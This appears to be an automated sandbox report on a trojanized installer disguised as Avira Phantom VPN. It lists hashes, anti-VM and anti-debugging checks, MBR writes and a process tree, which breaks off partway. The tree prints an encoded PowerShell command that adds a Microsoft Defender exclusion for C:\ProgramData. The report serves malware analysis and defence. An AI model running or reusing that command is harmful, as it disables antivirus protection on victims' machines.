Analysis
-
max time kernel
146s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
06-04-2023 12:26
Static task
static1
Behavioral task
behavioral1
Sample
AviraPhantomVPN.7z
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
AviraPhantomVPN.7z
Resource
win10v2004-20230220-en
General
-
Target
AviraPhantomVPN.7z
-
Size
28.6MB
-
MD5
edcaee17a820898e1ef4c3f1410d322d
-
SHA1
304a5c511e352ef0115d70b0dccb0f4802393b34
-
SHA256
645ff80fc1abf8919597a792ff5e26fb206f5ad0b5c08bf8a4a365585ca4ece0
-
SHA512
ce8637d4109997b01a43b4df6d6b0c78902533f56b750fb877044884e14497699239d8bd1ae17aee77bda9e5d4f3cfca4a080dc4b03294c109435fbcf302d2af
-
SSDEEP
786432:e6jVlMlC4wWESx547yBEQJXkE5Qa1z8eXY+o:bJ4Jn/x5JKQ9dxXY+o
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ VCR-2005-2023-09.02.2023.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ VCR-2005-2023-09.02.2023.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VCR-2005-2023-09.02.2023.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VCR-2005-2023-09.02.2023.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VCR-2005-2023-09.02.2023.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VCR-2005-2023-09.02.2023.exe -
Executes dropped EXE 6 IoCs
Processes:
AviraPhantomVPN.exeAviraPhantomVPN.tmpAvira Phantom VPN 2.41.1.25731.exeVCR-2005-2023-09.02.2023.exeAvira Phantom VPN 2.41.1.25731.tmpVCR-2005-2023-09.02.2023.exepid process 596 AviraPhantomVPN.exe 1596 AviraPhantomVPN.tmp 1048 Avira Phantom VPN 2.41.1.25731.exe 300 VCR-2005-2023-09.02.2023.exe 1572 Avira Phantom VPN 2.41.1.25731.tmp 1332 VCR-2005-2023-09.02.2023.exe -
Loads dropped DLL 13 IoCs
Processes:
AviraPhantomVPN.exeAviraPhantomVPN.tmpAvira Phantom VPN 2.41.1.25731.exeAvira Phantom VPN 2.41.1.25731.tmpVCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exepid process 596 AviraPhantomVPN.exe 1596 AviraPhantomVPN.tmp 1596 AviraPhantomVPN.tmp 1596 AviraPhantomVPN.tmp 1596 AviraPhantomVPN.tmp 1596 AviraPhantomVPN.tmp 1048 Avira Phantom VPN 2.41.1.25731.exe 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 300 VCR-2005-2023-09.02.2023.exe 1332 VCR-2005-2023-09.02.2023.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VCR-2005-2023-09.02.2023.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VCR-2005-2023-09.02.2023.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exedescription ioc process File opened for modification \??\PhysicalDrive0 VCR-2005-2023-09.02.2023.exe File opened for modification \??\PhysicalDrive0 VCR-2005-2023-09.02.2023.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exepid process 300 VCR-2005-2023-09.02.2023.exe 1332 VCR-2005-2023-09.02.2023.exe -
Drops file in Program Files directory 6 IoCs
Processes:
AviraPhantomVPN.tmpdescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe AviraPhantomVPN.tmp File created C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat AviraPhantomVPN.tmp File created C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-CEU7S.tmp AviraPhantomVPN.tmp File created C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-SDPLS.tmp AviraPhantomVPN.tmp File created C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.msg AviraPhantomVPN.tmp File opened for modification C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat AviraPhantomVPN.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 64 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\shell rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\.7z\ = "7z_auto_file" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe\shell\open\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_Classes\Local Settings rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe\shell rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\shell\open\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\shell\open rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\ rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 88003100000000005456aeb0110050524f4752417e310000700008000400efbeee3a851a5456aeb02a0000003c000000000001000000000000000000460000000000500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe\shell\open rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\.7z rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1" rundll32.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
AviraPhantomVPN.tmppowershell.exepowershell.exe7zFM.exeAvira Phantom VPN 2.41.1.25731.tmppid process 1596 AviraPhantomVPN.tmp 1596 AviraPhantomVPN.tmp 1488 powershell.exe 1420 powershell.exe 1396 7zFM.exe 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
7zFM.exepowershell.exepowershell.exedescription pid process Token: SeRestorePrivilege 1396 7zFM.exe Token: 35 1396 7zFM.exe Token: SeSecurityPrivilege 1396 7zFM.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeDebugPrivilege 1420 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
7zFM.exeAviraPhantomVPN.tmppid process 1396 7zFM.exe 1396 7zFM.exe 1596 AviraPhantomVPN.tmp -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
rundll32.exeAvira Phantom VPN 2.41.1.25731.tmppid process 1124 rundll32.exe 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp 1572 Avira Phantom VPN 2.41.1.25731.tmp -
Suspicious use of WriteProcessMemory 61 IoCs
Processes:
cmd.exerundll32.exe7zFM.exeAviraPhantomVPN.exeAviraPhantomVPN.tmpcmd.exeAvira Phantom VPN 2.41.1.25731.exeAvira Phantom VPN 2.41.1.25731.tmpnet.exeVCR-2005-2023-09.02.2023.exedescription pid process target process PID 1704 wrote to memory of 1124 1704 cmd.exe rundll32.exe PID 1704 wrote to memory of 1124 1704 cmd.exe rundll32.exe PID 1704 wrote to memory of 1124 1704 cmd.exe rundll32.exe PID 1124 wrote to memory of 1396 1124 rundll32.exe 7zFM.exe PID 1124 wrote to memory of 1396 1124 rundll32.exe 7zFM.exe PID 1124 wrote to memory of 1396 1124 rundll32.exe 7zFM.exe PID 1396 wrote to memory of 596 1396 7zFM.exe AviraPhantomVPN.exe PID 1396 wrote to memory of 596 1396 7zFM.exe AviraPhantomVPN.exe PID 1396 wrote to memory of 596 1396 7zFM.exe AviraPhantomVPN.exe PID 1396 wrote to memory of 596 1396 7zFM.exe AviraPhantomVPN.exe PID 1396 wrote to memory of 596 1396 7zFM.exe AviraPhantomVPN.exe PID 1396 wrote to memory of 596 1396 7zFM.exe AviraPhantomVPN.exe PID 1396 wrote to memory of 596 1396 7zFM.exe AviraPhantomVPN.exe PID 596 wrote to memory of 1596 596 AviraPhantomVPN.exe AviraPhantomVPN.tmp PID 596 wrote to memory of 1596 596 AviraPhantomVPN.exe AviraPhantomVPN.tmp PID 596 wrote to memory of 1596 596 AviraPhantomVPN.exe AviraPhantomVPN.tmp PID 596 wrote to memory of 1596 596 AviraPhantomVPN.exe AviraPhantomVPN.tmp PID 596 wrote to memory of 1596 596 AviraPhantomVPN.exe AviraPhantomVPN.tmp PID 596 wrote to memory of 1596 596 AviraPhantomVPN.exe AviraPhantomVPN.tmp PID 596 wrote to memory of 1596 596 AviraPhantomVPN.exe AviraPhantomVPN.tmp PID 1596 wrote to memory of 296 1596 AviraPhantomVPN.tmp cmd.exe PID 1596 wrote to memory of 296 1596 AviraPhantomVPN.tmp cmd.exe PID 1596 wrote to memory of 296 1596 AviraPhantomVPN.tmp cmd.exe PID 1596 wrote to memory of 296 1596 AviraPhantomVPN.tmp cmd.exe PID 296 wrote to memory of 1488 296 cmd.exe powershell.exe PID 296 wrote to memory of 1488 296 cmd.exe powershell.exe PID 296 wrote to memory of 1488 296 cmd.exe powershell.exe PID 296 wrote to memory of 1488 296 cmd.exe powershell.exe PID 296 wrote to memory of 1420 296 cmd.exe powershell.exe PID 296 wrote to memory of 1420 296 cmd.exe powershell.exe PID 296 wrote to memory of 1420 296 cmd.exe powershell.exe PID 296 wrote to memory of 1420 296 cmd.exe powershell.exe PID 1596 wrote to memory of 1048 1596 AviraPhantomVPN.tmp Avira Phantom VPN 2.41.1.25731.exe PID 1596 wrote to memory of 1048 1596 AviraPhantomVPN.tmp Avira Phantom VPN 2.41.1.25731.exe PID 1596 wrote to memory of 1048 1596 AviraPhantomVPN.tmp Avira Phantom VPN 2.41.1.25731.exe PID 1596 wrote to memory of 1048 1596 AviraPhantomVPN.tmp Avira Phantom VPN 2.41.1.25731.exe PID 1596 wrote to memory of 1048 1596 AviraPhantomVPN.tmp Avira Phantom VPN 2.41.1.25731.exe PID 1596 wrote to memory of 1048 1596 AviraPhantomVPN.tmp Avira Phantom VPN 2.41.1.25731.exe PID 1596 wrote to memory of 1048 1596 AviraPhantomVPN.tmp Avira Phantom VPN 2.41.1.25731.exe PID 1596 wrote to memory of 300 1596 AviraPhantomVPN.tmp VCR-2005-2023-09.02.2023.exe PID 1596 wrote to memory of 300 1596 AviraPhantomVPN.tmp VCR-2005-2023-09.02.2023.exe PID 1596 wrote to memory of 300 1596 AviraPhantomVPN.tmp VCR-2005-2023-09.02.2023.exe PID 1596 wrote to memory of 300 1596 AviraPhantomVPN.tmp VCR-2005-2023-09.02.2023.exe PID 1048 wrote to memory of 1572 1048 Avira Phantom VPN 2.41.1.25731.exe Avira Phantom VPN 2.41.1.25731.tmp PID 1048 wrote to memory of 1572 1048 Avira Phantom VPN 2.41.1.25731.exe Avira Phantom VPN 2.41.1.25731.tmp PID 1048 wrote to memory of 1572 1048 Avira Phantom VPN 2.41.1.25731.exe Avira Phantom VPN 2.41.1.25731.tmp PID 1048 wrote to memory of 1572 1048 Avira Phantom VPN 2.41.1.25731.exe Avira Phantom VPN 2.41.1.25731.tmp PID 1048 wrote to memory of 1572 1048 Avira Phantom VPN 2.41.1.25731.exe Avira Phantom VPN 2.41.1.25731.tmp PID 1048 wrote to memory of 1572 1048 Avira Phantom VPN 2.41.1.25731.exe Avira Phantom VPN 2.41.1.25731.tmp PID 1048 wrote to memory of 1572 1048 Avira Phantom VPN 2.41.1.25731.exe Avira Phantom VPN 2.41.1.25731.tmp PID 1572 wrote to memory of 844 1572 Avira Phantom VPN 2.41.1.25731.tmp net.exe PID 1572 wrote to memory of 844 1572 Avira Phantom VPN 2.41.1.25731.tmp net.exe PID 1572 wrote to memory of 844 1572 Avira Phantom VPN 2.41.1.25731.tmp net.exe PID 1572 wrote to memory of 844 1572 Avira Phantom VPN 2.41.1.25731.tmp net.exe PID 844 wrote to memory of 1664 844 net.exe net1.exe PID 844 wrote to memory of 1664 844 net.exe net1.exe PID 844 wrote to memory of 1664 844 net.exe net1.exe PID 844 wrote to memory of 1664 844 net.exe net1.exe PID 300 wrote to memory of 1332 300 VCR-2005-2023-09.02.2023.exe VCR-2005-2023-09.02.2023.exe PID 300 wrote to memory of 1332 300 VCR-2005-2023-09.02.2023.exe VCR-2005-2023-09.02.2023.exe PID 300 wrote to memory of 1332 300 VCR-2005-2023-09.02.2023.exe VCR-2005-2023-09.02.2023.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z1⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe"C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmp" /SL5="$500EE,28849760,1046016,C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\WebrootCommAgentService.bat""6⤵
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAAnACkA7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488 -
